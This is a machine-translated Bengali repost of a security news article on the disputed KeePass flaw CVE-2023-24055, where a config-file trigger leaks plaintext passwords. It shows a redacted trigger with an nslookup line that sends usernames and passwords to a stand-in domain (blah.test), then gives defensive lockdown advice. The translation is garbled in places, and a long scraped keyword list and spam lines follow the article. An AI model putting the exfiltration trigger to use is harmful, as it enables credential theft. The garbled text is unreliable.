পাসওয়ার্ড ম্যানেজারদের জন্য এটি একটি খবরের যোগ্য কয়েক সপ্তাহ - সেই সুবিধাজনক ইউটিলিটিগুলি যা আপনাকে আপনার ব্যবহার করা প্রতিটি ওয়েবসাইটের জন্য আলাদা পাসওয়ার্ড নিয়ে আসতে সাহায্য করে এবং তারপরে সেগুলির উপর নজর রাখতে।
2022 সালের শেষের দিকে, LastPass-এর পালা ছিল সব খবরে, যখন কোম্পানি শেষ পর্যন্ত স্বীকার করেছে যে 2022 সালের আগস্টে এটির একটি লঙ্ঘন প্রকৃতপক্ষে গ্রাহকদের পাসওয়ার্ডের সাথে শেষ হয়েছে vaults চুরি হচ্ছে ক্লাউড পরিষেবা থেকে যেখানে তাদের ব্যাক আপ করা হয়েছিল।
(পাসওয়ার্ডগুলি নিজেরাই চুরি করা হয়নি, কারণ ভল্টগুলি এনক্রিপ্ট করা ছিল এবং ব্যাকআপ ভল্ট ফাইলগুলির জন্য LastPass-এর কাছে কারও "মাস্টার কী" এর অনুলিপি ছিল না, তবে বেশিরভাগ লোকেরা শুনে খুশি হয়েছিল তার চেয়ে এটি একটি কাছাকাছি শেভ ছিল।)
তারপরে লাইফলকের পালা সমস্ত খবরের উপর নির্ভর করে, যখন সংস্থাটি সতর্ক করে দিয়েছিল যে এটি ফুসকুড়ির মতো দেখায়। পাসওয়ার্ড অনুমান আক্রমণ, সম্ভবত একটি সম্পূর্ণ ভিন্ন ওয়েবসাইট থেকে চুরি করা পাসওয়ার্ডের উপর ভিত্তি করে, সম্ভবত কিছুক্ষণ আগে, এবং সম্ভবত সম্প্রতি ডার্ক ওয়েবে কেনা।
লাইফলক নিজেই লঙ্ঘন করেনি, তবে এর কিছু ব্যবহারকারীর কাছে ছিল, পাসওয়ার্ড শেয়ারিং আচরণের জন্য ধন্যবাদ যা তারা নেওয়ার কথা মনে করতে পারে না।
প্রতিযোগী 1Password এবং BitWarden সম্প্রতি খবরে এসেছে, দূষিত বিজ্ঞাপনের প্রতিবেদনের উপর ভিত্তি করে, দৃশ্যত অনিচ্ছাকৃতভাবে Google দ্বারা সম্প্রচারিত, যা ব্যবহারকারীদের তাদের অ্যাকাউন্টের বিশদ ফিশিং করার লক্ষ্যে লগঅন পৃষ্ঠাগুলির প্রতিরূপ করতে প্রলুব্ধ করে৷
এবার KeePass এর পালা খবরে, এই সময় আরেকটি সাইবার নিরাপত্তা সমস্যা: একজন অভিযুক্ত দুর্বলতা, সফ্টওয়্যার বাগগুলির জন্য ব্যবহৃত শব্দ শব্দ যা সাইবার নিরাপত্তা গর্তের দিকে নিয়ে যায় যা আক্রমণকারীরা খারাপ উদ্দেশ্যে ব্যবহার করতে সক্ষম হতে পারে।
পাসওয়ার্ড স্নিফিং সহজ করা
আমরা এটি একটি হিসাবে উল্লেখ করছি দুর্বলতা এখানে কারণ এটির একটি অফিসিয়াল বাগ শনাক্তকারী রয়েছে, যা US ন্যাশনাল ইনস্টিটিউট ফর স্ট্যান্ডার্ডস অ্যান্ড টেকনোলজি দ্বারা জারি করা হয়েছে।
বাগ ডাব করা হয়েছে জন্য CVE-2023-24055: যে আক্রমণকারীর XML কনফিগারেশন ফাইলে লেখার অ্যাক্সেস রয়েছে সে একটি এক্সপোর্ট ট্রিগার যোগ করে ক্লিয়ারটেক্সট পাসওয়ার্ড পেতে পারে।
ক্লিয়ারটেক্সট পাসওয়ার্ড পেতে সক্ষম হওয়ার দাবি, দুর্ভাগ্যবশত, সত্য।
আমি আপনার তথাকথিত সহ আপনার ব্যক্তিগত ফাইল লিখতে অ্যাক্সেস আছে %APPDATA%
ডিরেক্টরি, আপনি ইতিমধ্যে কাস্টমাইজ করা যেকোন KeePass সেটিংস পরিবর্তন করতে, অথবা আপনি যদি জেনেশুনে কিছু পরিবর্তন না করে থাকেন তবে কাস্টমাইজেশন যোগ করতে আমি লুকোচুরি করে কনফিগারেশন বিভাগটি টুইক করতে পারি...
…এবং আমি আশ্চর্যজনকভাবে সহজেই আপনার প্লেইনটেক্সট পাসওয়ার্ড চুরি করতে পারি, হয় বাল্কে, উদাহরণস্বরূপ পুরো ডাটাবেসটিকে একটি এনক্রিপ্ট না করা CSV ফাইল হিসাবে ডাম্প করে, অথবা আপনি সেগুলি ব্যবহার করার মাধ্যমে, উদাহরণস্বরূপ একটি "প্রোগ্রাম হুক" সেট করে যা আপনি প্রতিবার অ্যাক্সেস করার সময় ট্রিগার করে। ডাটাবেস থেকে পাসওয়ার্ড।
মনে রাখবেন যে আমার প্রয়োজন নেই প্রশাসক বিশেষাধিকার, কারণ আমাকে প্রকৃত ইনস্টলেশন ডিরেক্টরির সাথে তালগোল পাকানোর দরকার নেই যেখানে KeePass অ্যাপটি সংরক্ষণ করা হয়, যা সাধারণত নিয়মিত ব্যবহারকারীদের জন্য সীমাবদ্ধ নয়
এবং আমার কোনো লক-ডাউন গ্লোবাল কনফিগারেশন সেটিংসে অ্যাক্সেসের প্রয়োজন নেই।
মজার বিষয় হল, আপনি যখন সেগুলি ব্যবহার করেন তখন আপনার পাসওয়ার্ডগুলিকে ছিনিয়ে নেওয়া বন্ধ করার জন্য KeePass তার পথের বাইরে চলে যায়, যার মধ্যে বিভিন্ন অ্যান্টি-কি-লগার কৌশলগুলি বন্ধ করার জন্য টেম্পার-সুরক্ষা কৌশলগুলি ব্যবহার করে এমনকি যাদের ইতিমধ্যেই সিস্যাডমিন ক্ষমতা রয়েছে তাদের কাছ থেকেও।
কিন্তু KeePass সফ্টওয়্যারটি প্লেইন টেক্সট পাসওয়ার্ড ডেটা ক্যাপচার করা আশ্চর্যজনকভাবে সহজ করে তোলে, সম্ভবত আপনি যেভাবে "খুব সহজ" বিবেচনা করতে পারেন, এমনকি অ-প্রশাসকদের জন্যও।
এটি তৈরি করতে KeePass GUI ব্যবহার করা এক মিনিটের কাজ ছিল৷ ট্রিগার প্রতিবার ক্লিপবোর্ডে পাসওয়ার্ড কপি করার জন্য ইভেন্টটি চালানোর জন্য এবং সেই ইভেন্টটিকে একটি DNS লুকআপ করার জন্য সেট করার জন্য যাতে প্রশ্নে ব্যবহারকারীর নাম এবং প্লেইনটেক্সট পাসওয়ার্ড উভয়ই অন্তর্ভুক্ত থাকে:
তারপরে আমরা সিস্টেমের অন্য ব্যবহারকারীর কনফিগারেশন ফাইলে আমাদের নিজস্ব স্থানীয় কনফিগারেশন ফাইল থেকে সেই বিকল্পের জন্য ভয়ঙ্করভাবে-স্পষ্ট XML সেটিংটি অনুলিপি করতে পারি, যার পরে তারাও তাদের পাসওয়ার্ডগুলি DNS লুকআপের মাধ্যমে ইন্টারনেটে ফাঁস হয়ে গেছে।
যদিও XML কনফিগারেশন ডেটা মূলত পঠনযোগ্য এবং তথ্যপূর্ণ, KeePass কৌতূহলবশত GUID নামে পরিচিত র্যান্ডম ডেটা স্ট্রিং ব্যবহার করে (এর জন্য সংক্ষিপ্ত বিশ্বব্যাপী অনন্য শনাক্তকারী) বিভিন্ন বোঝাতে ট্রিগার সেটিংস, যাতে একজন সুপরিচিত ব্যবহারকারীরও একটি বিস্তৃত রেফারেন্স তালিকার প্রয়োজন হয় যাতে বোঝা যায় কোন ট্রিগারগুলি সেট করা হয়েছে এবং কীভাবে।
আমাদের ডিএনএস-লিকিং ট্রিগারটি দেখতে কেমন তা এখানে, যদিও আমরা কিছু বিবরণ সংশোধন করেছি যাতে আপনি সরাসরি এই পাঠ্যটি অনুলিপি-পেস্ট করে কোনও তাত্ক্ষণিক দুষ্টুমি করতে না পারেন:
XXXXXXXXXXXXXXXXXXXXXX কপি DNS লুকআপের মাধ্যমে জিনিসপত্র চুরি করুন XXXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXXX.blah.test সত্য 1
এই ট্রিগারটি সক্রিয় থাকায়, একটি KeePass পাসওয়ার্ড অ্যাক্সেস করার ফলে আমার পছন্দের একটি ডোমেনে একটি অবাধ DNS লুকআপে প্লেইনটেক্সট ফাঁস হয়ে যায়, যা হল blah.test
এই উদাহরণে।
মনে রাখবেন যে বাস্তব জীবনের আক্রমণকারীরা প্রায় নিশ্চিতভাবেই চুরি করা টেক্সটকে ঝাঁকুনি বা অস্পষ্ট করে ফেলবে, যা শুধুমাত্র DNS ফাঁস হওয়ার সময় সনাক্ত করা কঠিন করে তুলবে না, বরং ASCII অক্ষরগুলি যেমন উচ্চারিত অক্ষর বা ইমোজির মতো পাসওয়ার্ডের যত্ন নেবে। যা অন্যথায় DNS নামে ব্যবহার করা যাবে না:
কিন্তু এটা সত্যিই একটি বাগ?
তবে জটিল প্রশ্ন হল, "এটি কি সত্যিই একটি বাগ, নাকি এটি শুধুমাত্র একটি শক্তিশালী বৈশিষ্ট্য যা এমন কেউ দ্বারা অপব্যবহার করা যেতে পারে যার ইতিমধ্যেই আপনার ব্যক্তিগত ফাইলগুলির উপর আপনার নিজের মতোই নিয়ন্ত্রণের প্রয়োজন হবে?"
সহজ কথায়, আপনার অ্যাকাউন্টের নিয়ন্ত্রণ ইতিমধ্যেই আছে এমন কেউ যদি আপনার অ্যাকাউন্টে অ্যাক্সেস করতে সক্ষম বলে মনে করা হয় এমন ফাইলগুলির সাথে জগাখিচুড়ি করতে পারে তবে এটি কি একটি দুর্বলতা?
যদিও আপনি আশা করতে পারেন যে একজন psword ম্যানেজার এই ধরণের বাগ/বৈশিষ্ট্যের অপব্যবহার করা কঠিন করার জন্য টেম্পার-সুরক্ষার প্রচুর অতিরিক্ত স্তর অন্তর্ভুক্ত করবে জন্য CVE-2023-24055 সত্যিই একটি CVE তালিকাভুক্ত দুর্বলতা হতে পারে?
যদি তাই হয়, যেমন আদেশ না DEL
(একটি ফাইল মুছুন) এবং FORMAT
খুব "বাগ" হতে হবে?
এবং PowerShell এর অস্তিত্ব থাকবে না, যা সম্ভাব্য বিপজ্জনক আচরণকে উস্কে দেওয়া অনেক সহজ করে তোলে (চেষ্টা করুন powerhsell get-clipboard
, উদাহরণস্বরূপ), তার নিজের সব একটি দুর্বলতা হতে পারে?
এটি KeePass এর অবস্থান, নিম্নলিখিত পাঠ্য দ্বারা স্বীকৃত যা যোগ করা হয়েছে "বাগ" বিশদ NIST এর ওয়েবসাইটে:
** বিতর্কিত ** […] দ্রষ্টব্য: বিক্রেতার অবস্থান হল যে পাসওয়ার্ড ডাটাবেস স্থানীয় পিসিতে সেই স্তরের অ্যাক্সেস রয়েছে এমন আক্রমণকারীর বিরুদ্ধে সুরক্ষিত হওয়ার উদ্দেশ্যে নয়।
কি করো?
আপনি যদি একজন স্বতন্ত্র KeePass ব্যবহারকারী হন, তাহলে আপনি KeePass অ্যাপটি খোলার মাধ্যমে উপরে তৈরি করা “DNS স্টিলার”-এর মতো দুর্বৃত্ত ট্রিগারগুলি পরীক্ষা করতে পারেন। টুলস > ট্রিগার... জানলা:
মনে রাখবেন আপনি পুরোটা ঘুরিয়ে দিতে পারেন ট্রিগার এই উইন্ডো থেকে সিস্টেম বন্ধ করুন, কেবল অপসারণ করে [ ] Enable trigger system
বিকল্প…
…কিন্তু এটি একটি বিশ্বব্যাপী সেটিং নয়, তাই এটি আপনার স্থানীয় কনফিগারেশন ফাইলের মাধ্যমে আবার চালু করা যেতে পারে, এবং সেইজন্য আপনার অ্যাকাউন্টে অ্যাক্সেস সহ আক্রমণকারীর কাছ থেকে না হয়ে শুধুমাত্র আপনাকে ভুল থেকে রক্ষা করে৷
গ্লোবাল "লকডাউন" ফাইলটি পরিবর্তন করে, আপনি কম্পিউটারে সকলের জন্য বিকল্পটিকে জোর করে বন্ধ করতে পারেন, তাদের পক্ষে এটিকে আবার চালু করার কোনো বিকল্প নেই। KeePass.config.enforced.XML
, ডিরেক্টরিতে পাওয়া যায় যেখানে অ্যাপ প্রোগ্রামটি নিজেই ইনস্টল করা আছে।
আপনার গ্লোবাল এক্সএমএল এনফোর্সমেন্ট ফাইলটি এইরকম হলে সবার জন্য ট্রিগারগুলি জোর করে বন্ধ করা হবে:
মিথ্যা
(যদি আপনি ভাবছেন, যে আক্রমণকারীর কাছে এই পরিবর্তনটি বিপরীত করার জন্য অ্যাপ্লিকেশন ডিরেক্টরিতে লেখার অ্যাক্সেস রয়েছে তার প্রায় নিশ্চিতভাবেই KeePass এক্সিকিউটেবল ফাইলটি নিজেই পরিবর্তন করতে বা যেভাবেই হোক একটি স্বতন্ত্র কীলগার ইনস্টল এবং সক্রিয় করতে যথেষ্ট সিস্টেম-স্তরের শক্তি থাকবে।)
আপনি যদি একজন নেটওয়ার্ক অ্যাডমিনিস্ট্রেটর হন যাকে আপনার ব্যবহারকারীদের কম্পিউটারে KeePass লক ডাউন করার দায়িত্ব দেওয়া হয়েছে যাতে এটি এখনও তাদের সাহায্য করার জন্য যথেষ্ট নমনীয়, কিন্তু ভুলবশত সাইবার অপরাধীদের সাহায্য করার জন্য তাদের পক্ষে যথেষ্ট নমনীয় নয়, আমরা KeePass এর মাধ্যমে পড়ার পরামর্শ দিই নিরাপত্তা বিষয়ক পৃষ্ঠা, ট্রিগারসমূহ পাতা, এবং এনফোর্সড কনফিগারেশন পাতা.
- এসইও চালিত বিষয়বস্তু এবং পিআর বিতরণ। আজই পরিবর্ধিত পান।
- প্লেটোব্লকচেন। Web3 মেটাভার্স ইন্টেলিজেন্স। জ্ঞান প্রসারিত. এখানে প্রবেশ করুন.
- উত্স: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- সক্ষম
- সম্পর্কে
- উপরে
- পরম
- প্রবেশ
- অ্যাক্সেস করা
- হিসাব
- সক্রিয়
- যোগ
- ভর্তি
- আপনার নিকটস্থ বিজ্ঞাপন !
- পর
- বিরুদ্ধে
- সব
- কথিত
- ইতিমধ্যে
- এবং
- অন্য
- অ্যাপ্লিকেশন
- আবেদন
- আগস্ট
- লেখক
- গাড়ী
- পিছনে
- সাহায্যপ্রাপ্ত
- পটভূমি চিত্র
- ব্যাকআপ
- ভিত্তি
- কারণ
- হচ্ছে
- সীমান্ত
- পাদ
- লঙ্ঘন
- নম
- বাগ
- গ্রেপ্তার
- যত্ন
- কেস
- ঘটিত
- কারণসমূহ
- কেন্দ্র
- অবশ্যই
- পরিবর্তন
- অক্ষর
- চেক
- পছন্দ
- দাবি
- কাছাকাছি
- মেঘ
- রঙ
- আসা
- কোম্পানি
- সম্পূর্ণরূপে
- কম্পিউটার
- কম্পিউটার
- পরিবেশ
- কনফিগারেশন
- বিবেচনা
- নিয়ন্ত্রণ
- কপি
- পারা
- আবরণ
- সৃষ্টি
- নির্মিত
- cve
- cybercriminals
- সাইবার নিরাপত্তা
- বিপজ্জনক
- অন্ধকার
- ডার্ক ওয়েব
- উপাত্ত
- ডেটাবেস
- বিস্তারিত
- DID
- বিভিন্ন
- সরাসরি
- প্রদর্শন
- DNS
- ডোমেইন
- Dont
- নিচে
- ডাব
- সহজ
- সহজে
- পারেন
- এনক্রিপ্ট করা
- প্রয়োগকারী
- যথেষ্ট
- সমগ্র
- এমন কি
- ঘটনা
- প্রতি
- সবাই
- উদাহরণ
- কাজে লাগান
- রপ্তানি
- ব্যাপক
- অতিরিক্ত
- বৈশিষ্ট্য
- কয়েক
- ফাইল
- নথি পত্র
- পরিশেষে
- আবিষ্কার
- নমনীয়
- অনুসরণ
- বল
- পাওয়া
- থেকে
- পাওয়া
- পেয়ে
- বিশ্বব্যাপী
- Goes
- গুগল
- কুশলী
- খুশি
- জমিদারি
- উচ্চতা
- সাহায্য
- এখানে
- গর্ত
- আশা
- বাতাসে ভাসিতে থাকা
- কিভাবে
- যাহোক
- এইচটিএমএল
- HTTPS দ্বারা
- আইডেন্টিফায়ার
- আশু
- in
- অন্তর্ভুক্ত করা
- অন্তর্ভুক্ত
- সুদ্ধ
- তথ্যপূর্ণ
- ইনস্টল
- উদাহরণ
- প্রতিষ্ঠান
- Internet
- সমস্যা
- ইস্যু করা
- IT
- নিজেই
- অপভাষা
- রাখা
- পরিচিত
- মূলত
- LastPassiOS এর
- স্তর
- নেতৃত্ব
- ফুটো
- লিকস
- উচ্চতা
- তালিকা
- স্থানীয়
- তাকিয়ে
- সৌন্দর্য
- খুঁজে দেখো
- প্রণীত
- করা
- তৈরি করে
- পরিচালক
- পরিচালকের
- মার্জিন
- সর্বোচ্চ প্রস্থ
- হতে পারে
- ভুল
- ভুল
- পরিবর্তন
- সেতু
- নাম
- জাতীয়
- প্রয়োজন
- নেটওয়ার্ক
- সংবাদ
- nst
- সাধারণ
- প্রাপ্ত
- কর্মকর্তা
- উদ্বোধন
- পছন্দ
- অন্যভাবে
- নিজের
- স্থিতিমাপ
- পাসওয়ার্ড
- পাসওয়ার্ড
- পল
- PC
- সম্প্রদায়
- সম্ভবত
- ব্যক্তিগত
- ফিশিং
- বাদ্য
- Plato
- প্লেটো ডেটা ইন্টেলিজেন্স
- প্লেটোডাটা
- অবস্থান
- পোস্ট
- সম্ভাব্য
- ক্ষমতা
- ক্ষমতাশালী
- ক্ষমতা
- শক্তির উৎস
- ব্যক্তিগত
- বিশেষাধিকার
- সম্ভবত
- কার্যক্রম
- কেনা
- উদ্দেশ্য
- করা
- প্রশ্ন
- এলোমেলো
- ফুসকুড়ি
- পড়া
- সম্প্রতি
- সুপারিশ করা
- নিয়মিত
- মনে রাখা
- অবিকল প্রতিরুপ
- রিপোর্ট
- প্রতিবেদন
- বিপরীত
- ঝুঁকি
- চালান
- অধ্যায়
- নিরাপদ
- অনুভূতি
- সেবা
- সেট
- বিন্যাস
- সেটিংস
- সংক্ষিপ্ত
- উচিত
- কেবল
- So
- সফটওয়্যার
- কঠিন
- কিছু
- কেউ
- অকুস্থল
- স্বতন্ত্র
- মান
- এখনো
- অপহৃত
- থামুন
- সঞ্চিত
- এমন
- অনুমিত
- করা SVG
- পদ্ধতি
- গ্রহণ করা
- প্রযুক্তি
- প্রযুক্তিঃ
- সার্জারির
- তাদের
- নিজেদের
- অতএব
- দ্বারা
- সময়
- থেকে
- অত্যধিক
- শীর্ষ
- পথ
- রূপান্তর
- স্বচ্ছ
- ট্রিগার
- সত্য
- চালু
- পরিণত
- সাধারণত
- অনন্য
- URL টি
- us
- ব্যবহার
- ব্যবহারকারী
- ব্যবহারকারী
- ইউটিলিটি
- বিভিন্ন
- খিলান
- উপকরণ
- মাধ্যমে
- দুর্বলতা
- W3
- উপায়
- ওয়েব
- ওয়েবসাইট
- সপ্তাহ
- কি
- যে
- হু
- ইচ্ছা
- ভাবছি
- হয়া যাই ?
- would
- লেখা
- এক্সএমএল
- আপনার
- নিজেকে
- zephyrnet